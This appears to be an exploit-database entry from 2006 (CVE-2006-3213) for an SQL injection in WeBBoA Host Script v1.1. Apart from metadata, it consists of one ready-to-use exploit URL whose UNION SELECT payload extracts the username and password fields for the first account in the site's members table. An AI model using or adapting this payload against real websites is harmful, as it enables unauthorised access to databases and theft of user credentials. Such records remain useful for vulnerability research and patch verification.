Author: EntriKa type: webapps platform: asp port: date_added: 2006-06-18 date_updated: verified: 1 codes: OSVDB-27505;CVE-2006-3213 tags: aliases: screenshot_url: application_url:
# There is Sql injection WeBBoA Host Script v1.1 # Risk=High # Exploit: http://[SITE]/?islem=host_satin_al&id=-1%20%20union%20select%200,1,2,kul_adi,4,5,6,7,sifre%20from%20members+where+uye_id=1 # Credit: EntriKa # milw0rm.com [2006-06-19]